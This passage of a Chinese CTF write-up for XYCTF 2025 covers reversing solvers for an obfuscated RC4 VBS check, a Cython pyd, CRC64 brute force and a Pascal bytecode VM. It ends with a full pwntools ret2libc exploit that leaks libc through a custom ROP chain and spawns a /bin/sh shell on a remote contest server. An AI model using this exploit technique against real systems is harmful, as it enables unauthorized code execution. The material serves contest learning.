) , int( -4380+4481 ) , int( 234889/5729 ) , int( 374-330 ) , int( 7121-7089 ) , int( -964+1014 ) , int( -9185+9226 ) , int( 53105/4085 ) , int( 1368-1358 ) , int( 3776-3744 ) , int( 81760/2555 ) , int( 2908-2876 ) , int( 672/21 ) , int( 591084/7578 ) , int( -9777+9878 ) , int( 4310-4190 ) , int( -329+445 ) , int( 8841-8828 ) , int( 80190/8019 ) , int( 9449-9417 ) , int( 5188-5156 ) , int( 6912/216 ) , int( 46496/1453 ) , int( 8868-8855 ) , int( -6823+6833 ) , int( -5834+5866 ) , int( 7348-7316 ) , int( 214720/6710 ) , int( -3281+3313 ) , int( -6230+6312 ) , int( -281+398 ) , int( -5980+6090 ) , int( 2673-2591 ) , int( 233897/3491 ) , int( -8111+8143 ) , int( -3952+4013 ) , int( 7846-7814 ) , int( 5859-5748 ) , int( 661752/5656 ) , int( 742632/6402 ) , int( 2362-2290 ) , int( 286234/2834 ) , int( 814-694 ) , int( 40105/3085 ) , int( 4489-4479 ) , int( -838+907 ) , int( -8563+8673 ) , int( -2698+2798 ) , int( -2969+3001 ) , int( 7600-7530 ) , int( 896805/7665 ) , int( -8073+8183 ) , int( 1727-1628 ) , int( -6557+6673 ) , int( 3501-3396 ) , int( 87357/787 ) , int( 4403-4293 ) , int( 3724-3711 ) , int( 4260-4250 ) , int( -6051+6064 ) , int( -71+81 ) , int( 466-427 ) , int( 6300-6268 ) , int( -15360+8376 ) , int( -1.435792E+08/8237 ) , int( -21866-10 ) , int( -4.86175E+07/8145 ) , int( -1.932544E+08/5987 ) , int( 3287-3159 ) , int( -19485+2053 ) , int( -10516-6235 ) , int( 78936/6072 ) , int( -9394+9404 ) , int( 551807/7559 ) , int( 973692/9546 ) , int( 310720/9710 ) , int( 507832/6682 ) , int( 4001-3934 ) , int( -4647+4744 ) , int( -6770+6885 ) , int( 491163/4863 ) , int( 10032-9992 ) , int( -1066+1148 ) , int( 174330/1490 ) , int( 986700/8970 ) , int( 78064/952 ) , int( -5671+5738 ) , int( -6282+6322 ) , int( 4287-4185 ) , int( 3549-3441 ) , int( 790162/8146 ) , int( 8188-8085 ) , int( -800+844 ) , int( 522-490 ) , int( -5550+5663 ) , int( 284291/2389 ) , int( -9338+9440 ) , int( -6438+6539 ) , int( 8277-8236 ) , int( -8711+8752 ) , int( -5591+5623 ) , int( 148291/2431 ) , int( -3434+3466 ) , int( 425372/5597 ) , int( -5132+5199 ) , int( -322+419 ) , int( 185380/1612 ) , int( 5352-5251 ) , int( 365160/9129 ) , int( 9277-9158 ) , int( -489+590 ) , int( 913002/8951 ) , int( -8433+8531 ) , int( 8830-8713 ) , int( 1089-970 ) , int( 192990/1838 ) , int( -9564+9681 ) , int( -5453+5554 ) , int( 40221/981 ) , int( -7928+7960 ) , int( 756672/9008 ) , int( 785824/7556 ) , int( 1607-1506 ) , int( -5161+5271 ) , int( -8087+8100 ) , int( 90010/9001 ) , int( 34688/1084 ) , int( 20224/632 ) , int( 8731-8699 ) , int( 178496/5578 ) , int( -837+914 ) , int( -4694+4809 ) , int( -7603+7706 ) , int( 619212/9382 ) , int( 1092906/9846 ) , int( 7594-7474 ) , int( 69632/2176 ) , int( 133042/3913 ) , int( 9457-9390 ) , int( 2319-2208 ) , int( 475200/4320 ) , int( -8977+9080 ) , int( -8597+8711 ) , int( 1592-1495 ) , int( 754812/6507 ) , int( -6078+6195 ) , int( -9522+9630 ) , int( 1824-1727 ) , int( -6145+6261 ) , int( 312690/2978 ) , int( -1513+1624 ) , int( 902220/8202 ) , int( 1378-1263 ) , int( -8522+8555 ) , int( -6796+6828 ) , int( -57+124 ) , int( -4239+4350 ) , int( 964212/8458 ) , int( 573534/5031 ) , int( 565903/5603 ) , int( -8417+8516 ) , int( 1116732/9627 ) , int( -8648+8680 ) , int( -6586+6656 ) , int( -1832+1908 ) , int( -5339+5404 ) , int( 559267/7877 ) , int( 138765/4205 ) , int( 2868-2834 ) , int( 556-543 ) , int( 53810/5381 ) , int( 212589/3081 ) , int( -4647+4755 ) , int( 712885/6199 ) , int( -1506+1607 ) , int( 91234/7018 ) , int( 1299-1289 ) , int( -4904+4936 ) , int( 9659-9627 ) , int( 117024/3657 ) , int( 38720/1210 ) , int( 440748/5724 ) , int( 19320/168 ) , int( -9444+9547 ) , int( -3384+3450 ) , int( 9050-8939 ) , int( -6493+6613 ) , int( -5110+5142 ) , int( -2061+2095 ) , int( 1450-1363 ) , int( 111+3 ) , int( 9913-9802 ) , int( 152680/1388 ) , int( -1082+1185 ) , int( 4066-4034 ) , int( 6896-6794 ) , int( 838-730 ) , int( -2902+2999 ) , int( 5974/58 ) , int( -8244+8290 ) , int( -9640+9674 ) , int( 36491/2807 ) , int( -2075+2085 ) , int( -301+370 ) , int( -2824+2934 ) , int( -2915+3015 ) , int( 1811-1779 ) , int( -7946+8019 ) , int( -5275+5377 ) , int( -7424+7437 ) , int( 34620/3462 )]
for i in range(len(src)):
if(src[i] < 0 or src[i] > 256):
src[i] = src[i] % 256
print(bytes(src))
输出去混淆后的vbs脚本,简单整理下格式
虽然还有乱码,但是不影响理解了
MsgBox "Dear CTFER. Have fun in XYCTF 2025!"
flag = InputBox("Enter the FLAG:", "XYCTF")
wefbuwiue = "90df4407ee093d309098d85a42be57a2979f1e51463a31e8d15e2fac4e84ea0df622a55c4ddfb535ef3e51e8b2528b826d5347e165912e99118333151273cc3fa8b2b3b413cf2bdb1e8c9c52865efc095a8dd89b3b3cfbb200bbadbf4a6cd4" ' ¢è¿RC4å»æ¼å
èæ½¼ï
qwfe = "rc4key"
' ÀåçRC4åæ°
Function RunRC(sMessage, strKey)
Dim kLen, i, j, temp, pos, outHex
Dim s(255), k(255)
' åå?
kLen = Len(strKey)
For i = 0 To 255
s(i) = i
k(i) = Asc(Mid(strKey, (i Mod kLen) + 1, 1)) ' ¯é¥½è¨ASCII¼ç
Next
' KSA¯é¥°å¦
j = 0
For i = 0 To 255
j = (j + s(i) + k(i)) Mod 256
temp = s(i)
s(i) = s(j)
s(j) = temp
Next
' PRGAæµç
i = 0 : j = 0 : outHex = ""
For pos = 1 To Len(sMessage)
i = (i + 1) Mod 256
j = (j + s(i)) Mod 256
temp = s(i)
s(i) = s(j)
s(j) = temp
' å¹è¬¸å
è?
Dim plainChar, cipherByte
plainChar = Asc(Mid(sMessage, pos, 1)) ' çASCII¤ç
cipherByte = s((s(i) + s(j)) Mod 256) Xor plainChar
outHex = outHex & Right("0" & Hex(cipherByte), 2)
Next
RunRC = outHex
End Function
' ¸é°éè
If LCase(RunRC(flag, qwfe)) = LCase(wefbuwiue) Then
MsgBox "Congratulations! Correct FLAG!"
Else
MsgBox "Wrong flag."
End If
看出是经过RC4加密,用Cyberchef解一下得到flag。最后MD5提交
moon#
比较常规的py调用pyd。一开始不能正常运行,后来尝试换了几个版本,在3.11跑起来了
用help命令,简单看一下:
从这里就可以推测出加密逻辑了,之后结合静态分析进一步验证。
IDA分析pyd,去了符号,但是可以看到一个导出函数 PyInit_moon。结合分析cython的经验,我们要找的函数应该在它之前,所以能比较容易定位到题中两个函数的实现。
sub_180002550 维护了一个类似字符串常量池的结构,后面分析时要经常借助这里面的字符串和偏移量来恢复符号。偏移和对应的字符串在内存上是紧挨着的。
函数的调用也是有迹可循的,一般是先从字符串池中拿到函数名,之后拿到函数的引用,最后显式调用 PyObject_Call 之类的API完成调用,中间穿插大量错误检查的代码和GC等等。一些明显的特征如下:
PyErr_Format(PyExc_NameError, "name '%U' is not defined", var);
PyObject_GetAttr(v1, v2);
PyDict_GetItem_KnownHash
基本数据类型的方法一般是由API直接实现,比如 PyNumber_Xor 之类。结合这些信息,大概分析出逻辑:
xor_crypt:初始化seed,用random.randint得到的随机数和传入的字节数组异或
check_flag:调用xor_crypt,和硬编码的密文比较。
因为check的逻辑不复杂,而且异或可逆,所以可以黑盒调用 xor_crypt,传入密文得到明文flag。
import moon
seed_val = moon.SEED
target = moon.TARGET_HEX
data = [int(target[i*2:(i+1)*2],16) for i in range(len(target)//2)]
print(moon.xor_crypt(seed_val,bytes(data)))
Dragon#
bc 文件格式对应LLVM的bitcode IR,使用LLVM编译工具链中的 llc 将其编译为x86/64架构的目标文件
llc .\Dragon.bc -filetype=obj -o Dragon.o
IDA分析,输入的flag每2个字节一组计算CRC64,考虑爆破求解。
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
#include<stdint.h>
#include"ida_def.h"
__int64 calculate_crc64_direct(unsigned __int8 *a1, unsigned __int64 a2)
{
__int64 v3; // [rsp+0h] [rbp-28h]
unsigned __int64 i; // [rsp+8h] [rbp-20h]
unsigned __int64 j; // [rsp+10h] [rbp-18h]
v3 = -1;
for ( i = 0; i < a2; ++i )
{
v3 ^= (unsigned __int64)a1[i] << 56;
for ( j = 0; j < 8; ++j )
{
if ( v3 >= 0 )
v3 *= 2ull;
else
v3 = (2ull * v3) ^ 0x42F0E1EBA9EA3693ull;
}
}
return ~v3;
}
void brute(uint64_t target_crc, uint8_t *result)
{
uint8_t input[2];
uint64_t computed_crc;
for (int b1 = 0x20; b1 < 0x7F; b1++)
{
for (int b2 = 0x20; b2 < 0x7F; b2++)
{
input[0] = (uint8_t)b1;
input[1] = (uint8_t)b2;
computed_crc = calculate_crc64_direct(input, 2);
if (computed_crc == target_crc)
{
result[0] = b1;
result[1] = b2;
return;
}
}
}
result[0] = 0;
result[1] = 0;
}
unsigned char crcdata[] =
{
0x47, 0x7B, 0x9F, 0x41, 0x4E, 0xE3, 0x63, 0xDC, 0xC6, 0xBF,
0xB2, 0xE7, 0xD4, 0xF8, 0x1E, 0x03, 0x9E, 0xD8, 0x5F, 0x62,
0xBC, 0x2F, 0xD6, 0x12, 0xE8, 0x55, 0x57, 0xCC, 0xE1, 0xB6,
0xE8, 0x83, 0xCC, 0x65, 0xB6, 0x2A, 0xEB, 0xB1, 0x7B, 0xFC,
0x6B, 0xD9, 0x62, 0x2A, 0x1B, 0xCA, 0x82, 0x93, 0x87, 0xC3,
0x73, 0x76, 0xA0, 0xF8, 0xFF, 0xB1, 0xE1, 0x05, 0x8E, 0x38,
0x27, 0x16, 0xA8, 0x0D, 0xB7, 0xAA, 0xD0, 0xE8, 0x1A, 0xE6,
0xF1, 0x9E, 0x45, 0x61, 0xF2, 0xE7, 0xD2, 0x3F, 0x78, 0x92,
0x0B, 0xE6, 0x6F, 0xF5, 0xA1, 0x7C, 0xC9, 0x63, 0xAB, 0x3A,
0xB7, 0x43, 0xB0, 0xA8, 0xD3, 0x9B
};
int main()
{
__int64 v7[13];
unsigned char result[0x42];
memcpy(v7, crcdata, 0x60u);
for(int r=0;r<12;r++)
{
brute(v7[r],result+2*r);
printf("%s\n",(char*)result);
}
return 0;
}
Lake#
Pascal编译的程序,先在github找了一圈,没找到现成的反编译工具。还是用IDA老老实实分析。
尝试用finger恢复了一部分符号,效果还不错。
之后在 start 函数附近找到了加密逻辑:
switch-case 实现了一个简单的虚拟机,可以发现handler都是一些基本的二元运算,编写脚本来还原代码
bytecode = [0x0002, 0x0002, 0x000C, 0x0001, 0x001A, 0x0055, 0x0001, 0x0023,
0x000C, 0x0002, 0x000E, 0x0009, 0x0001, 0x001B, 0x0006, 0x0008, 0x0006,
0x0005, 0x0008, 0x0001, 0x0005, 0x0002, 0x001B, 0x000E, 0x0002, 0x0019,
0x0003, 0x0002, 0x001A, 0x0004, 0x0008, 0x0004, 0x0008, 0x0001, 0x0003,
0x000C, 0x0002, 0x000C, 0x000A, 0x0001, 0x0025, 0x0002, 0x0001, 0x0020,
0x0002, 0x0001, 0x0009, 0x000C, 0x0008, 0x001A, 0x0005, 0x0002, 0x0004,
0x000D, 0x0008, 0x0008, 0x000F, 0x0002, 0x000A, 0x000E, 0x0001, 0x0010,
0x0007, 0x0001, 0x000C, 0x0007, 0x0008, 0x0022, 0x0008, 0x0008, 0x0015,
0x000A, 0x0001, 0x0027, 0x007E, 0x0002, 0x0007, 0x0002, 0x0008, 0x000F,
0x0003, 0x0008, 0x000A, 0x000A, 0x0001, 0x0022, 0x000B, 0x0002, 0x0012,
0x0008, 0x0002, 0x0019, 0x0009, 0x0008, 0x000E, 0x0006, 0x0008, 0x0000,
0x0005, 0x0001, 0x000A, 0x0008, 0x0008, 0x001B, 0x0007, 0x0008, 0x000D,
0x0006, 0x0008, 0x000D, 0x0004, 0x0008, 0x0017, 0x000C, 0x0008, 0x0022,
0x000E, 0x0002, 0x0012, 0x0034, 0x0001, 0x0026, 0x0077]
handler = {
1:"data[%d] += %d",
2:"data[%d] -= %d",
3:"data[%d] *= %d",
4:"data[%d] /= %d",
5:"data[%d] %= %d",
6:"data[%d] &= %d",
7:"data[%d] |= %d",
8:"data[%d] ^= %d"
}
dec_handler = {
1:"data[%d] -= %d",
2:"data[%d] += %d",
3:"data[%d] /= %d",
4:"data[%d] *= %d",
8:"data[%d] ^= %d"
}
def dis(lst):
fmt = handler[lst[0]]
print(fmt%(lst[1],lst[2]))
def dec_dis(lst):
fmt = dec_handler[lst[0]]
print(fmt%(lst[1],lst[2]))
for i in range(0,len(bytecode),3):
dis(bytecode[i:i+3])
dec_dis(bytecode[i:i+3])
之后发现加密都是单字节的线性运算,只用到了加减和异或,还原时输出对应的逆运算即为解密代码。
后面还有一个4字节的编码,通过移位打乱位的顺序,也是比较容易写出逆运算。
def decode_optimized(data):
original = bytearray(40)
for i in range(0, 10):
if 4 * i + 1 <= 39:
b3_low = data[4*i + 3] & 0b00000111
b3_high = data[4*i + 3] & 0b11111000
original[4*i + 1] |= (b3_low << 5) & 0xFF
original[4*i + 0] |= (b3_high >> 3) & 0xFF
if 4 * i <= 39:
b2_low = data[4*i + 2] & 0b00000111
b2_high = data[4*i + 2] & 0b11111000
original[4*i + 3] |= (b2_high >> 3) & 0xFF
original[4*i + 0] |= (b2_low << 5) & 0xFF
if 4 * i + 3 <= 39:
b1_low = data[4*i + 1] & 0b00000111
b1_high = data[4*i + 1] & 0b11111000
original[4*i + 2] |= (b1_high >> 3) & 0xFF
original[4*i + 3] |= (b1_low << 5) & 0xFF
if 4 * i + 2 <= 39:
b0_low = data[4*i] & 0b00000111
b0_high = data[4*i] & 0b11111000
original[4*i + 2] |= (b0_low << 5) & 0xFF
original[4*i + 1] |= (b0_high >> 3) & 0xFF
return list(original)
data = [0x4A, 0xAB, 0x9B, 0x1B, 0x61, 0xB1, 0xF3, 0x32, 0xD1, 0x8B,
0x73, 0xEB, 0xE9, 0x73, 0x6B, 0x22, 0x81, 0x83, 0x23, 0x31,
0xCB, 0x1B, 0x22, 0xFB, 0x25, 0xC2, 0x81, 0x81, 0x73, 0x22,
0xFA, 0x03, 0x9C, 0x4B, 0x5B, 0x49, 0x97, 0x87, 0xDB, 0x51]
data = decode_optimized(data)
data[2] += 12
data[26] -= 85
data[35] -= 12
data[14] += 9
data[27] -= 6
data[6] ^= 5
data[1] ^= 5
data[27] += 14
data[25] += 3
data[26] += 4
data[4] ^= 8
data[3] -= 12
data[12] += 10
data[37] -= 2
data[32] -= 2
data[9] -= 12
data[26] ^= 5
data[4] += 13
data[8] ^= 15
data[10] += 14
data[16] -= 7
data[12] -= 7
data[34] ^= 8
data[21] ^= 10
data[39] -= 126
data[7] += 2
data[15] ^= 3
data[10] ^= 10
data[34] -= 11
data[18] += 8
data[25] += 9
data[14] ^= 6
data[0] ^= 5
data[10] -= 8
data[27] ^= 7
data[13] ^= 6
data[13] ^= 4
data[23] ^= 12
data[34] ^= 14
data[18] += 52
data[38] -= 119
print(bytes(data))
解出的flag有几个字节不正确,但是大部分没问题,根据上下文含义修复一下即可
Pwn#
ret2libc’s revenge#
签到pwn,无PIE,无canary,放心栈溢出。
使用 fgetc(stdin) 循环读取输入,数组没有越界检查,导致溢出。
题目已经明示了打 ret2libc,刚好虚拟机是glibc 2.35,和题中版本一样,省了不少事
先找几个有用的gadget。
0x000000000040101a : ret
0x0000000000401016 : add rsp, 8 ; ret
0x0000000000401017 : add esp, 8 ; ret
0x00000000004010e3 : nop ; and rsi, 0 ; ret
0x00000000004010e4 : and rsi, 0 ; ret
0x00000000004010e5 : and esi, 0 ; ret
0x00000000004010ea : nop ; add rsi, qword ptr [rbp + 0x20] ; ret
0x00000000004010ec : add esi, dword ptr [rbp + 0x20] ; ret
0x00000000004010eb : add rsi, qword ptr [rbp + 0x20] ; ret
0x0000000000401180 : mov rdi, rsi ; ret
0x0000000000401181 : mov edi, esi ; ret
发现不能直接控制 rdi,但是可以构造如下的ROP链 替换原先的 pop rdi ;ret
and rsi, 0; ret
add rsi, qword ptr [rbp + 0x20]; ret
ret
ret
add rsp, 8; ret
qword rdi_value
mov rdi, rsi; ret
因为要用到 rbp 来写入寄存器,所以溢出时不能覆盖 rbp 的值,可以在覆盖 v6 的时候直接改成 rbp+8 的地址,跳到写rop的地方来。
另外,stdout 设置了全缓冲,要多次返回 main 挤满缓冲区拿到输出。本地的缓冲区长度和远程不一样,多次尝试发现远程长度是 0x1000。
(赛时在这里卡了很久,半天看不到 puts_got 的回显,一度以为自己rop链有问题,本地各种尝试也没搞明白。后来看到主函数中的 puts 也没输出,开始想是不是 setvbuf 动了手脚,一看果然。。
完整exp:
from pwn import *
context(os="linux",arch="amd64",log_level="debug")
host,port = "39.106.71.197", 30761
io=remote(host,port)
#io=process("./attachment")
ret = 0x40101a
and_rsi_ret = 0x4010e4
add_rsi_ret = 0x4010eb
add_rsp_ret = 0x401016
mov_rdi_rsi_ret = 0x401180
main_addr = 0x40127b
revenge_addr = 0x4011ff
elf=ELF("./attachment")
libc=ELF("./libc-2.35.so")
puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
padstack = b'a' * (0x220 - 4) + b'\x28'
payload0 = padstack + p64(main_addr)
payload1 = flat([
padstack,
p64(and_rsi_ret),
p64(add_rsi_ret),
p64(ret),
p64(ret),
p64(add_rsp_ret),
p64(puts_got),
p64(mov_rdi_rsi_ret),
p64(puts_plt),
p64(revenge_addr)
])
def stdout_leak():
io_round = 0x1000//19-1
for i in range(io_round):
io.sendline(payload0)
io.sendline(payload1)
io.sendline(payload0)
out = io.recv(0x1000)
leak_addr = out[(io_round+1)*19:][:6]
leak_addr = u64(leak_addr.ljust(8,b"\x00"))
print(hex(leak_addr))
return leak_addr
leak = stdout_leak()
libc.address = leak - libc.symbols["puts"]
system = libc.symbols["system"]
binsh = next(libc.search(b"/bin/sh\x00"))
payload2 = flat([
padstack,
p64(and_rsi_ret),
p64(add_rsi_ret),
p64(ret),
p64(ret),
p64(add_rsp_ret),
p64(binsh),
p64(mov_rdi_rsi_ret),
p64(system)
])
io.sendline(payload2)
io.interactive()